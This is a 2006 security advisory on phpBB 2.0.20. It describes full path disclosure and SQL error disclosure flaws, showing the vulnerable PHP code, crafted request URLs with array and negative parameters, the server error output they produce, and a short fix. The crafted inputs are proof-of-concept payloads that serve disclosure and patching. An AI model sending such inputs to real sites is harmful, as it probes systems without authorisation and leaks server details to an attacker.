[phpBB 2.0.20 Full Path Disclosure and SQL Errors]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 1.5.2006
- -Public: 5.5.2006
from CXSecurity.Com
CVE:
- - CVE-2006-2219 Full Path Disclosure
- - CVE-2006-2220 Sql Errors
- --- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a
user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP
server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal
free community solution for all web sites.
Contact with author http://www.phpbb.com/about.php.
- --- 1. Full Path Disclosure ---
Many scripts, for example phpBB, have a basic bug. It exists in variables, which are being inserted into script, into
specific functions. For example function htmlspecialchars()
...
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|ls", &str, &str_len, "e_style,
&hint_charset, &hint_charset_len) == FAILURE) {
return;
}
...
As you can see there is a protection from formatting input variable. If the variable is other than string, we have error
with Full Path Disclosure.
Example:
http://[HOST]/2020/phpBB2/memberlist.php?mode[]=cx
- ---Code ---
if ( isset($HTTP_GET_VARS['mode']) || isset($HTTP_POST_VARS['mode']) )
{
$mode = ( isset($HTTP_POST_VARS['mode']) ) ? htmlspecialchars($HTTP_POST_VARS['mode']) :
htmlspecialchars($HTTP_GET_VARS['mode']);
}
else
{
$mode = 'joined';
}
- ---Code ---
- ---Result ---
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /www/2020/phpBB2/memberlist.php on line 40
Warning: Cannot modify header information - headers already sent by (output started at
/www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 483
Warning: Cannot modify header information - headers already sent by (output started at
/www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 485
Warning: Cannot modify header information - headers already sent by (output started at
/www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 486
- ---Result ---
http://[HOST]/2020/phpBB2/viewtopic.php?t=2&highlight[]=cx
- ---Result ---
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /www/2020/phpBB2/viewtopic.php on line 487
Warning: urlencode() expects parameter 1 to be string, array given in /www/2020/phpBB2/viewtopic.php on line 498
Warning: Cannot modify header information - headers already sent by (output started at
/www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 483
Warning: Cannot modify header information - headers already sent by (output started at
/www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 485
Warning: Cannot modify header information - headers already sent by (output started at
/www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 486
- ---Result ---
Problem appears if display_errors==1, but it exists on many websites. (even at php.net).
- --- 2. Sql Errors ---
Problem appears because we can add everything (INT) to the end of SQL query (LIMIT). The query will fail if the value is
below 0 or above -2^32.
Example:
http://[HOST]/2020/phpBB2/memberlist.php?start=-1
- ---Code ---
$start = ( isset($HTTP_GET_VARS['start']) ) ? intval($HTTP_GET_VARS['start']) : 0;
- ---Code ---
- ---Result ---
Could not query users
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
for the right syntax to use near '-1, 50' at line 4
SELECT username, user_id, user_viewemail, user_posts, user_regdate, user_from, user_website, user_email, user_icq,
user_aim, user_yim, user_msnm, user_avatar, user_avatar_type, user_allowavatar FROM phpbb_users WHERE user_id <>
-1 ORDER BY user_regdate ASC LIMIT -1, 50
Line : 151
File : memberlist.php
- ---Result ---
- --- 3. How to fix ---
Turn off display_errors or use function like is_string().
- --- 4. Contact ---
Author: Maksymilian Arciemowicz